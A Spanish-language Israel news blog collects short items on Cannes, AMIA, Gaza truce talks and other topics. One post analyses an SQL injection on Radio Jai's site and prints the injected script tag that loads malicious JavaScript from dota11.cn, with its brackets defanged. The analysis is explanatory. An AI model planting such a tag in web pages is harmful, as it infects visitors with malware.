Bienvenido a Israel Noticias. Un blog donde vas a encontrar noticias de Israel, Medio Oriente y el mundo judio.

Para ver más noticias o noticias antiguas, revisa el archivo de noticias en el menú derecho, o usa el buscador ubicado en el menú izquierdo.

Últimas noticias:

Un cortometraje israelí ganó el premio "Cinéfondation" en el Festival de Cannes

cannes_tmb.jpgSe trata de la película "Himno", dirigida por Elad Keidan. Es la primera vez que un film de ese país gana el primer premio de la categoría.

La película israelí "Himno", dirigida por el cineasta Elad Keidan, obtuvo hoy el primer premio en la categoría 'cortometrajes' del Festival de Cannes, convirtiéndose en el primer film israelí que se destaca con esta distinción.

El corto, que dura 36 minutos, narra la historia de un excéntrico hombre que en su camino al supermercado se va cruzando con diferentes personas. "Es como un Gran Lebowski israelí", dijo Keidan en declaraciones al diario israelí Haaretz y agregó que, para la realización, se inspiró en el cine de Israel y en la labor del legendario cineasta, David Perlov.

"Himno" nació como parte del proyecto de trabajo final de la carrera que Keidan estudiaba en la Escuela "Sam Spiegel" de Cine y Televisión y más tarde fue presentada para ser examinada por la organización del festival de Cannes.

Durante su discurso, el director le agradeció a sus profesores y dedicó un momento especial para un recordatorio: "Quiero dedicarle este premio a un amigo de la escuela, Issac Levi, que hizo el diseño de sonido y murió en diciembre a causa de un cáncer", expresó conmovido.

Tras el anuncio del premio, el director mencionó a la prensa que deseaba regresar a Israel "para poner un pie en la industria cinematográfica local" y destacó que tiene planes para desarrollar nuevos cortos y largometrajes.

"Mi deseo es hacer cine en Israel", dijo Keidan premio en mano.

En segundo lugar quedó el trabajo de la francesa Claire Burger, "Forbach", y el tercer puesto lo compartieron el coreano Park Jae-Ok y el finlandés Juho Kuosmanen, con "Stop" y "Kestomerkitsijt", respectivamente.
Fuente: AJN

Leer todo...

Un terremoto de pequeña magnitud sacudió el norte de Israel

El Instituto Geofísico de Israel informó que se trató de un sismo de 3,3 en la escala de Richter. No se reportaron heridos.

Un terremoto de 3,3 en la escala de Richter sacudió, hoy por la noche, la localidad de Kiryat Shmona y sus alrededores.
El sismo no provocó heridos, según se informó oficialmente.
Los científicos del Instituto de Sismología de Israel precisaron que el epicentro del terremoto fue en el sur del Líbano.
Fuente: AJN

Leer todo...

Amy Winehouse entrará a rehabilitación en Israel por 36 horas

Amy Winehouse entrará a rehabilitación en Israel por 36 horasLa cantante Amy Winehouse planea volar a Israel para hacer un tratamiento de rehabilitación, en un intento por terminar de una vez con su adicción a las drogas.

La estrella se someterá a un “muy breve, intensivo y efectivo tratamiento” en el Barzilai Medical Centre que le costará 12.800 dólares.

Anoche, Amy le dio a su padre un mensaje especial para sus fans. Mitch Winehouse le dijo a la audiencia en los Ivor Novello Music Awards: "Amy se está poniendo mejor y les manda sus cariños. Ella me pidió que le agradeciera a mucha gente: a su productor Mark Ronson, a su familia y amigos y a todos sus fans que le mandan mensajes de apoyo todos los días”.

Se cree que Amy volará a Israel de inmediato para poder volver a grabar canciones con el músico Pete Doherty lo antes posible. Sus preocupados admiradores están rezando para que la estrella pueda librarse de sus demonios de una vez y para siempre.

Winehouse -quien recibirá un tratamiento de 36 horas- será atendida por Andre Waismann, quien dijo: “Todos mis pacientes son dados de alta saludables y no vuelven a ser dependientes”.

“Hay una confusión acerca de la adicción a la droga. La gente cree que es un problema psicológico y social, pero es un problema neurológico. Sea Amy Winehouse o cualquier otro, es un privilegio para mí ser capaz de tratar a cualquier opio-dependientes, y permitirles tener una vida normal”.
Fuente: AdnMundo

Leer todo...

Concurso educativo “Jidón Israel LaNoar”: El ganador del concurso se hará acreedor de un viaje a Israel en el marco de un programa educativo

"Jidón Israel LaNoar”, es un concurso educativo organizado por: la Agencia Judía para Israel, AMIA, BAMÁ, KKL, OSA y Vaad Hajinuj, en el marco de los festejos de los 60 años del Estado de Israel, con el objetivo de promover en los jóvenes el estudio de la historia y la cultura de nuestra querida Mediná, y estimular así su vínculo con ella.

El Jidón es presentado en un CD interactivo, en el cual los participantes pueden acceder a los contenidos propuestos de manera dinámica, novedosa, entretenida y desafiante. Este certamen está destinado a todos los jóvenes judíos de 15 y 16 años del país, sin ser condición para participar del mismo la pertenencia a algún espacio educativo.

El ganador del concurso se hará acreedor de un viaje a Israel en el marco de un programa educativo.

Comité Organizador del Jidón

Para más información e inscripción, ingresar a: www.bamah.org

Ante cualquier consulta, rogamos comunicarse al: 4132-3766 ó escribir a jidon@bamah.org
Fuente: AJN

Leer todo...

Inauguran en Israel el primer monumento nacional en homenaje a las víctimas del atentado a la AMIA

Se realizará el próximo 18 de julio, cuando se conmemore el 14º aniversario del ataque terrorista a la mutual judía, en la ciudad de Kyriat Yam, al norte del país.

El primer monumento nacional construido en Israel en homenaje a las víctimas del atentado terrorista a la AMIA será inaugurado el próximo 18 de julio en la ciudad de Kiryat Yam, al norte de Israel.
El “Gan (jardín) AMIA” reconocerá el ataque cometido a la mutual judía como un “acto terrorista” perpetrado “contra la colectividad judía” en Argentina.
La inauguración se realizará el mismo día en que se conmemorará el 14º aniversario del atentado, que provocó 85 muertos.
En la ceremonia participará el embajador argentino en Israel, Atilio Molteni, funcionarios del municipio de Kiryat Yam y familiares de las víctimas que viven en el Estado hebreo; también actuará el coro de la Organización Latinoamericana en Israel (OLEI).
En diálogo con la Agencia Judía de Noticias (AJN), Graciela Szapiro, presidenta de la filial Kiryat Yam de la OLEI, aseguró que la iniciativa fue un pedido de los familiares de las víctimas que viven en Israel y que no tenían “lugar donde recordar a sus seres queridos”.
“Desde 2000 han llegado más de mil familias argentinas, muchas de las cuales tienen parientes que murieron en los atentados a la AMIA y a la Embajada de
Israel en Buenos Aires”, expresó Szapiro.
La dirigente dijo que “era inaceptable que en Israel no existiera un monumento a nivel nacional o gubernamental reconociendo el atentado de la mutual como un acto terrorista en contra de la colectividad judía” en Argentina.
En ese sentido, Szapiro contó que “la lucha por el reconocimiento” comenzó hace dos años, cuando desde la organización se dirigieron “al Ministerio de Absorción para que aceptaran lo que pedían los familiares”.
El proyecto se encuentra en la “etapa final” de construcción, agregó en diálogo con esta agencia.
El monumento fue construido en hierro forjado y cemento, posee dos pilares triangulares que se apoyan a los lados, y en el centro se alza un Maguen David, la Estrella de David.
Por detrás se alza una placa de tres metros de altura con luces diminutas, encendidas permanentemente que representan a los 114 fallecidos en los ataques, de 1992 y 1994. Tres mástiles de banderas completan el monumento, que en su conjunto simboliza el “intento de destrucción de un pueblo, que siempre continúa intacto y unido”, según explicó el director del proyecto, el ingeniero Walter Goncalvez.
“La estrella de David, puede abrirse en sus triángulos, pero vuelve a unirse en un magní­fico Maguen David”, destacó.
Szapiro aseguró que está “casi todo listo” para la inauguración del monumento, aunque indicó que resta aún “el último empujoncito” económico para los detalles finales del proyecto.
Fuente: AJN

Leer todo...

Mayoría de israelíes se opone a retirada de Altos del Golán: Encuesta

La mayoría de los israelíes se oponen a firmar la paz con Siria a cambio de que Israel se retire de los Altos del Golán, informó el jueves el diario local Ha'aretz.

Cerca del 68 por ciento de los encuestados desean mantener la situación actual, que implica conservar Cisjordania y los Altos del Golán en manos de Israel, de acuerdo con la encuesta, realizada por el instituto de investigación Maagar Mochot para evaluar el estado de soberanía e independencia del país a los 60 años de su fundación.

Entre las dos zonas ocupadas, señala el estudio, los israelíes prefieren los estratégicamente situados Altos del Golán. Sólo el 4 por ciento eligió la opción de "Línea Verde fronteriza con Cisjordania pero sin los Altos del Golán", mientras que el 18 por ciento seleccionó la opción de las "Línea Verde fronteriza con el Golán pero sin Cisjordania", lo que significaría la división de Jerusalén.

Alrededor del 35 por ciento expresó que es "moderadamente o muy probable" que tomase medidas ilegales para evitar la evacuación del Golán, y sólo un 17 por ciento señaló que estaría dispuesto a realizar actos ilegales para evitar la evacuación de cualquier asentamiento grande en Cisjordania, según el estudio.

La encuesta fue publicada un día después de que Israel y Siria confirmaran de forma simultánea el lanzamiento de las conversaciones indirectas de paz con la mediación de Turquía. Funcionarios turcos afirmaron que ambas partes comprenden que un futuro acuerdo de paz deberá incluir la retirada completa de Israel de los Altos del Golán.
Fuente: PeopleDaily

Leer todo...

Afirma Barack Obama que siempre apoyará la seguridad de Israel

El precandidato presidencial demócrata Barack Obama dijo hoy al cortejar al poderoso voto judío, que 'siempre apoyará la seguridad de Israel', y advirtió que no se debe negociar con grupos terroristas que intentan su destrucción.

Como parte de su gira de tres días por Florida, Obama afirmó este jueves ante cientos de judíos en una sinagoga de Boca Ratón, que Estados Unidos no debe negociar con grupos islámicos fundamentalistas como Hamas o Hezbollah, salvo que reconozcan la existencia de Israel.

El senador por Illinois reiteró su posición en referencia a críticos republicanos que lo quieren relacionar con organizaciones pro palestinas, y al virtual candidato republicano John McCain quien lo ha criticado por su voluntad para dialogar con Irán y Corea del Norte.

El aspirante demócrata a la Casa Blanca destacó que en sus 60 años como estado, Israel ha florecido 'como una democracia fuerte y vibrante' y aseguró que 'no hay amistad más profunda' que el lazo entre Estados Unidos y el estado judío.

Obama afirmó que también hay un 'lazo histórico' entre las comunidades judía y afroestadunidense.

Agregó que de ser electo en los comicios presidenciales de noviembre, ratificará su 'compromiso' inalterable de mantener esa relación entre los dos países, pues 'siempre apoyaré la seguridad de Israel'.

En la Casa Blanca, añadió, trabajaría, 'por dos estados (Israel y Palestina) que puedan convivir lado a lado, en paz y seguridad'.

Obama consideró que aún 'hay mucho trabajo' para la paz duradera y estimó que 'debemos trabajar hombro a hombro' con 'nuestro aliado y amigo'.

Reiteró que la invasión a Irak hizo más poderoso a Irán, cuya amenaza 'es grande y real'.

El senador por Illinois, quien lidera el conteo nacional de delegados hacia la nominación presidencial demócrata, dijo que si llega a la Casa Blanca advertirá a Irán para que termine su apoyo a grupos terroristas y las amenazas contra Israel y otras naciones.

Junto con Nueva York, Florida cuenta con una de las mayores y más poderosas comunidades judías de Estados Unidos, y en ambos grupos tiene un notable apoyo la precandidata Hillary Clinton.
Fuente: Cronica(Mexico)

Leer todo...

Casi es atacado el avión de Tony Blair

Aviones de combate israelíes interceptaron el aparato en el que viajaba el ex primer ministro británico, porque la tripulación no se identificó. Los pilotos ya habían tomado una posición de ataque

Blair, enviado especial del Cuarteto para Oriente Medio, viajaba a Israel desde la localidad egipcia de Sharm el Sheij, donde participaría de una reunión del Foro Económico Mundial (FEM), cuando su avión fue interceptado el pasado miércoles.

La tripulación debió explicar en una comunicación por radio que el ex jefe del Gobierno viajaba en el avión después de que las aeronaves israelíes adoptasen una posición de ataque.


Los medios subrayan hoy que el sistema de defensa aérea de Israel es uno de los más estrictos del mundo y los aviones de guerra de ese país despegan muchas veces por alarmas falsas.
Fuente: Infobae

Leer todo...

Sobre el ataque a la página de Radio Jai

Es mi intención, con lo que escribo más abajo, aclarar la situación que se dió y calmar así la preocupación de los oyentes.

En el dia de ayer, la página de Radio Jai dejó de funcionar.
Según pude escuchar de la boca del director de la radio en el programa que va a las 18 hs., "terroristas informáticos" habrían atacado la misma.
Hoy escuche a los locutores de la mañana y el mediodia hablando del ataque de piratas del ciberespacio contra la radio.
Pero la verdad, el colmo fue la grabación que estan pasando constantemente diciendo que "delincuentes informáticos" atacaron la radio para evitar que difunda el mensaje y comunique noticias.
También dice que es un "privilegio no deseado" ya que según ellos el ataque habia sido contra la radio por su importancia en el medio, tomandolo casi como un halago.
Esto no es del todo cierto.

Lo que pasó fue que ayer, la página se vio inundada de un código que se habia introducido en los titulos de todas las noticias.
El codigo fue el siguiente: [script src=http://www.dota11.cn/m.js][/script] (ATENCIÓN: La página que aparece ahi tiene código malicioso, NO ENTRE! - Los simbolos '< ' y '>' fueron reemplazados por '[' y ']' por seguridad)

Me resultó extraño e investigué un poco.
Poniendo este código en Google, aparecen 554 páginas con el mismo código metido en sus titulares. (En Yahoo! aparecen 700).
Ninguna de estas páginas es de la Comunidad, ni son de importancia y van desde páginas de Argentina, México, EEUU hasta China.
Luego encontré que a un par de personas le había pasado lo mismo (aca y aca) en sus propias páginas y habian llegado a la conclusión de que se trataba de un ataque por Inyección de SQL en páginas programadas en ASP.

("Una inyección SQL sucede cuando se inserta o 'inyecta' un código SQL 'invasor' dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos." - Wikipedia)
Al parecer, en el dia de ayer, varias páginas que no estaban preparadas y actualizadas para protegerse de este tipo de ataques, sufrieron exactamente el mismo daño (como podemos leer aca).
Y no fue culpa de ninguna persona tratando de desestabilizar a la radio por nada en particular como lastimosamente aseguran en su mensaje, sino que el responsable (aparentemente) fue un bot, un código automático, que estuvo dando vueltas ayer por la red buscando páginas que tengan esta vulnerabilidad para despues explotarla, sin importarle de quien es la página.
Lo que hizo este robot fue inyectar en las tablas de la base de datos, un código que insertaba en la página un iframe con código malicioso.
En esta página muestran una lista de hoy de las páginas que alojan este código para ejecutar este tipo de ataques por inyección de SQL, entre las cuales se encuentra dota11.cn (NO ENTRAR!) que es la que apareció en Radio Jai.
Y como cuenta esta persona, el codigo varia de alojamiento (en el caso de la radio es dota11.cn (NO ENTRAR!) ) asi que el número de páginas infectadas es mayor al que habia buscado en un principio.

Como información adicional, queria comentar que hay gente (que seguramente necesita conseguirse una novia) que se la pasa buscando páginas en internet que tengan vulnerabilidades y cuando las encuentran, las explotan sin importarle quien es el dueño de la página.

Conclusión:
Despues de haber conseguido suficientes pruebas, puedo decir casi seguro, que el ataque no fue un ataque directo a la radio por su papel de radio judía, sino un ataque producido porque el servidor SQL no estaba preparado para recibir este tipo de ataques.
(No fue un ataque del ala infórmatica de Hamas ni nada parecido, ni siquiera de alguien que tenga algo contra la radio)

Esto no tiene como objetivo desmerecer a la Radio y el trabajo de todos los que estan tratando de resolver el problema.
Todo lo contrario, con esto espero echar un poco de luz sobre la situación y si alguien de Radio Jai precisa más información o explicación más a fondo pueden mandarme un mail sin compromiso a todosconisrael@gmail.com.

Espero haber aclarado algo de la situación y espero de corazón que el problema pueda ser resuelto lo antes posible.
Escucho la radio todos los dias y lo último que se merecen es tener que resolver problemas por un gusano que anda dando vueltas.

Aprovecho para felicitar a Radio Jai por el trabajo que hacen dia a dia.

Fuente: ConIsrael

Leer todo...

El subdirector del FBI visitará mañana la AMIA

John Pistole mantendrá reuniones con la directiva de la entidad y de la DAIA. Además, el funcionario norteamericano rendirá homenaje a las víctimas del terrible atentado terrorista que padeció la mutual judía en 1994.

El subdirector del FBI, John Pistole, visitará mañana la sede de la Asociación Mutual Israelita Argentina (AMIA), donde depositará una ofrenda floral en honor a las víctimas del atentado terrorista de 1994 y mantendrá reuniones con dirigentes de esa institución y de la Delegación de Asociaciones Israelitas Argentinas (DAIA).

La visita del subdirector se realizará a las 9:45 en la sede ubicada en Pasteur 633, de esta Capital, informó la Embajada de los Estados Unidos en la Argentina.

Pistole depositará una ofrenda floral en la plaza seca de la AMIA en honor a las víctimas del atentado del 18 de julio de 1994. Luego, se reunirá con los dirigentes de la institución y de la DAIA, y más tarde dirigirá un discurso.

La visita sucederá un día después de que el subdirector sea recibido por la presidente Cristina Kirchner en la Casa de Gobierno, lo que está programado para esta tarde.
Fuente: Infobae

Leer todo...

Robert De Niro construirá un lujoso hotel en Hertzlia

The image “http://www.adn.es/clipping/ADNIMA20071120_3499/4.jpg” cannot be displayed, because it contains errors.Será un edificio de arquitectura japonesa que contará con 225 plazas y un spa. La inauguración está prevista para el 2010 y es un emprendimiento del actor, junto con su hijo y un grupo inversor israelí.


El actor Robert De Niro junto a su hijo, Rafael, y un grupo de socios israelí construirán un hotel en la ciudad de Hertzlia, con una inversión de 178 millones de dólares, según lo anunció el propio artista en un conocido restaurante de Londres.

Los inversores que lo acompañarán en el emprendimiento son la familia Strauss y el grupo Tidhar, y la obra, que será edificada sobre el centro comercial "Arena" de Hertzlia, estará en manos del arquitecto americano David Rockwell.

El hotel abrirá sus puertas dentro de dos años y contará con 225 habitaciones, tendrá un estilo de arquitectura japonés y contará con un gran club de SPA diseñado como espacio de relax.

Según el director de ventas, Sigal Ben-Moshe, todas las habitaciones estarán disponibles para la compra en 600.000 dólares o 1,7 millones en el caso de los pent-house.

El Grupo Tidhar y la familia Strauss precisaron que una de las aspiraciones es poder experimentar una expansión adicional con sucursales del hotel en otros sitios, como Grecia y Europa del Este.

Fuente: Iton Gadol

Leer todo...

Se alcanzó un acuerdo de unidad para conducir AMIA

The image “http://www.verbocomunicacion.com.ar/edit_newsletter/2007febrero/images/logo_amia120.jpg” cannot be displayed, because it contains errors.Guillermo Borger, del Bloque Unido Religioso, asumirá el cargo de presidente el próximo 12 de junio. La unión de todos los sectores se logró en la Asamblea de Representantes de Asociados (RAT), que se realizó esta tarde.

El representante del Bloque Unido Religioso, Guillermo Borger, será el próximo presidente de la AMIA, decisión que se alcanzó esta noche, tras un trabajoso acuerdo entre todos los sectores que participaron de las elecciones del pasado 13 de abril.

Borger, quien asumirá su cargo el próximo 12 de junio, aseguró que la comisión directiva de la que formará parte "tendrá como objetivo y como método de trabajo la unidad y la inclusión de todos los judíos de la República Argentina, sin distinción de ideologías, creencias religiosas o preferencias políticas".

El flamante presidente declaró además a la Agencia Judía de Noticias (AJN) que “sin duda, la unión y el trabajo en conjunto será el leiv motiv de la próxima gestión de la AMIA”.

Por su parte, Tomás Saieg, representante del Bloque Unido Religioso, destacó, también a AJN, que la clave del acuerdo está expresado en el término hebreo “ajdut”, que significa “unión y es sinónimo de hermandad, el bien más importante”.

La nueva comisión también estará integrada por Angel Barman, como vicepresidente de la entidad del sector ortodoxo apoyados por el Movimiento Renovador y el Likud, así como por representantes de la lista 1, Amia es de Todos, encabezada por Sergio Brukman, titular del Colegio Arlene Fern -que es impulsada por el rabino Sergio Bergman-, completando la comisión 4 miembros de Avodá.

Los 90 miembros del RAT quedaron definidos en las elecciones realizadas el domingo 13 de abril: 34 pertenecen a la Lista 4, del sector ortodoxo; 30 a la Lista 3; 21 a la 1; tres a la Lista 2 Movimiento Sionista Renovador y dos a la 5, Compromiso con la Comunidad.

En los comicios de abril, ninguna de las agrupaciones obtuvo la mayoría absoluta, razón por la que el nombre del nuevo presidente se conoció recién hoy.

De los 90 miembros que debían votar, votaron 83 de la siguiente manera:
64 votos a favor
10 en contra
9 abstenciones

Fuente: Iton Gadol

Leer todo...

Los usuarios de Nintendo online no podrán utilizar apodos como "Hitler"

The image “http://nextgengamers.files.wordpress.com/2007/11/wii_big.jpg” cannot be displayed, because it contains errors.La empresa Nintendo prohibió el uso de apodos como Adolf Hitler, Stalin y Osama Bin Laden. El objetivo es evitar la molestia de otros jugadores.

La empresa japonesa Nintendo restringió el acceso a los jugadores de la modalidad online de Wii a la utilización de nombres de dictadores tales como Adolf Hitler, Joseph Stalin y Osama Bin Laden.

Líder en ventas de su generación, Wii es la sexta videoconsola producida por la compañía cuya particular ventaja es su mando inalámbrico y la posibilidad de bajar actualizaciones por Internet.

Mediante esta nueva reglamentación del juego online de Wii, Nintendo pretende prever molestias que puedan ser ocasionadas por el uso de estos nombres e impedir que se hieran sentimientos en el marco del juego.

Fuente: AJN

Leer todo...

Israel inició un histórico diálogo de paz con Siria

The image “http://msnbcmedia1.msn.com/j/msnbc/Components/Photos/070430/070430_olmert_hmed_130a.hmedium.jpg” cannot be displayed, because it contains errors.Las conversaciones serán "de forma seria y continuada a fin de lograr una paz completa de acuerdo con los términos de la Conferencia de Madrid de 1991", afirmó Olmert

Israel y Siria comenzaron negociaciones de paz indirectas bajo los auspicios de Turquía, según confirmó hoy la oficina del primer ministro israelí, Ehud Olmert, en un comunicado.

"Hemos decidido proseguir el diálogo de forma seria y continuada a fin de lograr una paz completa de acuerdo con los términos de la Conferencia de Madrid", de 1991, afirma la nota.

Ambas partes manifiestan en el escrito "su intención de llevar a cabo estas conversaciones de buena fe y con la mente abierta".

Además, agradecen al primer ministro turco, Recep Tayyip Erdogan, "su papel en este proceso y su generosa hospitalidad".

El pasado abril Erdogan viajó a Damasco para fomentar la reanudación del diálogo entre Siria e Israel, y a fines de ese mes el presidente sirio, Bachar al Asad, reveló que Olmert le había ofrecido a través del primer ministro turco la devolución por Israel de los Altos del Golán a cambio de la paz bilateral.

Esta fórmula ya se barajó en las llamadas conversaciones de Ginebra de 2000, que finalmente no fructificaron.

Siria e Israel están en estado de "no beligerancia" desde 1974, después de haberse enfrentado en tres guerras en 1948, 1967 y 1973, aunque desde entonces han librado enfrentamientos en suelo libanés e Israel ha atacado con bombardeos aéreos en varias ocasiones el territorio sirio.

El último ataque se produjo el 6 de septiembre, cuando cazabombarderos israelíes destruyeron en el norte de Siria lo que, según la administración estadounidense, era el embrión de una central nuclear que se construía con asesoramiento norcoreano.

Fuente: InfoBae

Leer todo...

Los taxis de Tel Aviv pasan a ser hibridos

Los vehiculos hibridos usan un motor que combina electricidad y nafta que emite relativamente poca cantidad de contaminación.
Hay dos tipos de autos hibridos actualmente en Israel; el Honda Civic hibrido y el Toyota Prius.

El representante de la Asociación de Choferes de Taxi de Israel, Israel Fried, se reunió con Moshe Belsenheim, el jefe de la Autoridad de Medio Ambiente de la Municipalidad de Tel Aviv y los dos accedieron a que duranto las próximas semanas, dos de las estaciones de taxi de la ciudad empezarían a usar vehiculos hibridos.
Solo un taxi hibrido está siendo usado actualmente en Tel Aviv, del modelo Toyota Prius.

El plan incluye beneficios ofrecidos a los conductores de taxi que compren autos hibridos. En una entrevista con Ynet, Belsenheim explicó que la Municipalidad puede alentar el uso de vehiculos ecológicos de una cantidad de maneras. "Es posibla darle a los conductores descuentos en los peajes, más espacio para estacionar en sus estaciones, o simplificar las restricciones del manejo" dijo.

Fuente: Ynet
Traducido por ES.
Artículo completo (ingles): aca

Leer todo...

Israel se prepara para una operación en Gaza

Las Fuerzas de Defensa de Israel (IDF) ordenaron prepararse para una posible escalada en Gaza mientras los oficiales israelies esperan una respuesta de Hamas sobre el acuerdo de cese de fuego.
Según fuentes políticas, por cómo se ve ahora, el grupo terrorista no aceptaría todas las condiciones de Israel.

Preparandose para la confrontación: Israel se esá preparando para la posibilidad de que los esfuerzos de un acuerdo de calma con Hamas fallen, impulsando a las IDF a embarcarse en una operación militar de gran escala en contra de los terroristas de Hamas.

Oficiales en Jerusalem dijeron este Martes por la noche que seguido de la reunion en Cairo entre el jefe de inteligencia egipcio Omar Suleiman y representantes del Hamas, asi como tambien con miembros de otros grupos terroristas de Gaza, el Gabinete de Seguridad Nacional estaría por decidir si Israel se dirige a una cese de fuego o a embarcarse en una operación militar.

Durante sus reuniones con altos oficiales de seguridad de Egipto, Ehud Barak dijo que de no concretarse un acuerdo de cese de fuego, llevaría a una escalada militar en la Franja de Gaza.

Las condiciones de Israel para un acuerdo incluye un importante progreso en un acuerdo que asegure la liberación del soldado secuestrado de territorio israelí Guilad Shalit, asi como el fin del contrabando de armas.

Fuente: YNet
Traducido y adaptado por: ES

Leer todo...

Israel acepta principio de tregua en Gaza, según un responsable egipcio

Israel dio su acuerdo de principio a una tregua en la Franja de Gaza, territorio bajo el control de los islamistas palestinos de Hamas, anunció este martes un alto responsable egipcio citado por la agencia oficial MENA.

"Los dirigentes israelíes declararon su apoyo y su comprensión a la propuesta egipcia referente a una tregua" en la Franja de Gaza, controlada por Hamas desde junio de 2007, afirmó el responsable egipcio, que pidió el anonimato.

Israel se declaró "dispuesto a aplicarla en cuanto los dirigentes israelíes sean informados del acuerdo de las organizaciones palestinas a los elementos de la tregua", agregó la misma fuente.

Interrogado por AFP, Mark Regev, portavoz del primer ministro israelí Ehud Olmert, indicó sin otras precisiones: "En lo que nos concierne, sólo podemos indicar que los contactos continúan".

El responsable egipcio, el jefe de los servicios secretos egipcios, Omar Suleiman, transmitió el acuerdo de principio israelí a una delegación de Hamas que llegó el lunes a El Cairo.

Esa delegación está presidida por el número dos de su buró político, Mussa Abu Marzuk, y está integrada por tres de sus dirigentes en Gaza: Mahmud Zahar, Jalil Al Hayya y Jamal Abu Hachem.

La propuesta egipcia consiste en una tregua inicial -cese de las operaciones militares israelíes en Gaza y de los disparos de cohetes palestinos sobre Israel- que daría paso a negociaciones sobre un intercambio de prisioneros entre el Estado hebreo y el movimiento islamista palestino, además de la apertura de los puntos de paso en la Franja de Gaza, precisó la misma fuente.

La misma fuente llamó implícitamente al Hamas a responder favorablemente, al estimar que es necesario "no dejar pasar una oportunidad histórica".

Una reunión está prevista con los grupos palestinos para abordar "el inicio de la aplicación (de la propuesta egipcia) con una intensificación de los esfuerzos egipcios para resolver asuntos como el intercambio de prisioneros (...) y el levantamiento total del bloqueo" impuesto por Israel a Gaza, añadió.

El lunes, el ministro israelí de Defensa, Ehud Barak, analizó la tregua en Egipto con el presidente egipcio, Hosni Mubarak, y advirtió contra el riesgo de una escalada militar en la Franja de Gaza si continúan los disparos de cohetes contra Israel.

A cambio del cese de los disparos, Hamas exige el fin de los ataques israelíes, el levantamiento del bloqueo y la reapertura de los puntos de paso, en particular el de Rafah, en la frontera con Egipto.

Israel exige el fin de los ataques con cohetes, el cese del contrabando de armas entre la península egipcia del Sinaí y Gaza y avances con miras a la liberación del soldado israelí Gilad Shalit capturado en 2006 por un comando palestino en la frontera de Gaza.

En cuanto a la violencia en Gaza, cuatro palestinos, entre ellos un niño de 13 años, murieron este martes en varios ataques del ejército israelí contra la Franja de Gaza, informaron los servicios de emergencia locales y testigos.

El niño, Majd Kalil Abu Okal, fue mortalmente herido en un ataque aéreo en Beit Lahya, en el norte del territorio, indicó el doctor Muawiya Hassanin, jefe del servicio de emergencia.

El ejército israelí confirmó el ataque, afirmando que tenía como blanco una "célula que disparó cohetes" contra la sureña ciudad de Sderot.

Tres cohetes alcanzaron el sur de Israel sin hacer víctimas, según fuentes militares israelíes.

Poco después del ataque aéreo, un palestino de 32 años, Ali Al-Dahdu, murió por un disparo israelí en el sector de Maghazi, en el centro de la Franja de Gaza, según los servicios de urgencias.

Un portavoz militar israelí mencionó un "ataque aéreo contra un grupo de palestinos que colocaban un artefacto explosivo a proximidad de la cerca de seguridad" entre la Franja e Israel.

Un activista palestino del brazo armado de Hamas, Mohamad Odeh, de 28 años, murió en Zeitun, un barrio de Gaza, según el jefe de los servicios de urgencia. Según testigos palestinos, fue víctima de disparos de tanques israelíes, lo que no fue confirmado por el ejército israelí.

Otro activista del Hamas herido por los disparos, Zeid Abu Wadi, de 21 años, falleció en el hospital, informaron fuentes médicas.

Estos ataques dejaron además 15 heridos, según los servicios médicos palestinos.

Fuente: AFP

Leer todo...

Lola Ochoa gana el Open de Israel de Tenis en Silla de Ruedas, el 10º título individual de su carrera

La española Lola Ochoa ha logrado el título de campeona en el único cuadro femenino del Open de Israel de Tenis en Silla de Ruedas, con lo que consigue su primer triunfo individual después de ocho torneos en esta temporada. Por su parte, Bárbara Vidal sólo pudo llegar hasta los cuartos de final, mientras que la semana pasada también hubo presencia española en otras competiciones, con Álvaro Illobre finalista individual y de dobles en el Open de Croacia y Oliver Puras como cuartofinalista en el Open de Casablanca.


El abierto israelí se celebró en Tel Aviv del 12 al 15 de mayo, era de categoría ITF3 y Lola Ochoa (25ª en el ranking internacional entonces) partió como segunda cabeza de serie. La valenciana derrotó en los cuartos de final a la británica Susan Paisley (51) por 4-5, 6-1 y 6-2, e hizo lo propio en las semifinales ante la francesa Christine Schoenn-Anchling (38), por 6-2 y 6-1.

Ochoa se encontró en la final con una de las mejores jugadoras del mundo, la israelí Ilanit Fridman (11), con la que ya perdió esta temporada en los cuartos de final del torneo Alpi del Mare (ITF3). Esta vez, la española se impuso a su rival en un duro partido, por 6-4 y 7-6.

También en Tel Aviv, Bárbara Vidal (58) doblegó en la primera ronda a la israelí Natalie Liberman (103), por 6-1 y 7-5, pero no pudo con Fridman, que endosó un doble 0-6 a la tenista barcelonesa.

En cuanto a los dobles femeninos, Ochoa y Vidal se impusieron en los cuartos de final a Fridman y Liberman, por 1-6, 6-2 y 6-3, esta última manga a modo de tie break, pero sucumbieron en las semifinales ante las británicas Paisley y Louise Hunt (67), por 5-7, 6-3 y 4-6, también con la última manga con tie break.

En cualquier caso, Ochoa, que cumple su duodécima temporada con experiencia en torneos internacionales de tenis en silla de ruedas, ha disputado ya 51 competiciones foráneas y acumula ya 10 victorias individuales y tres de dobles.

Así, la valenciana estrenó su palmarés de campeona individual en 2000 con el Torneo de Revel francés (satellite 2), donde ganó el único cuadro, y lo agrandó con los segundos cuadros del Open Polaco (CS3) y el Open de Praga Indoor (CS3) en 2002.

2003 fue el año más laureado para Ochoa, ya que se impuso en los segundos cuadros del Open de Francia (CS1), el Open de Amberes (CS3) y el Open de Praga Indoor (CS3), y el único cuadro femenino del Torneo de Motfermeil francés (CS5).

Después, la española se adjudicó el triunfo en el cuadro único del Open de Praga Indoor (ITF3) de 2005, con lo que sumó su tercera victoria en este torneo checo. Al año siguiente, se impuso en el único cuadro del Open Italiano (ITF3), y ahora acumula un título más, el de Israel.

Además, Ochoa cuenta en su palmarés con los títulos de dobles del Open Polaco (CS3) de 2002, el de Girona Costa Brava (CS4) de 2004, el de Amphion-Publier (ITF3) de 2005 y el de Minas (ITF3) de esta temporada.
Fuente: SolidaridadDigital

Leer todo...

Soldados israelíes evitaron ataque suicida matando a terrorista

Soldados israelíes apostados en el puesto de control de Hawara ubicado cerca de Shjem evitaron un ataque terrorista al dar muerte a un joven palestino que llevaba una carga explosiva.

Los soldados registraron movimientos sospechosos de un joven palestino que esperaba en el puesto para ingresar a Israel, que en un momento buscó activar la carga. Los soldados dispararon y dieron muerte al terrorista.
Fuente: ElReloj

Leer todo...

Israel dice que el nazi más buscado del mundo viviria en la Patagonia o en Chile

Aribert Heim, hoy de 93 años, permanece prófugo de la justicia alemana desde 1962 y por su captura los gobiernos de Austria y Alemania ofrecen 485.000 dólares. Está acusado de haber matado a cientos de internos en el campo de concentración Mauthausen, en Austria, con inyecciones de combustible o veneno directo al corazón.
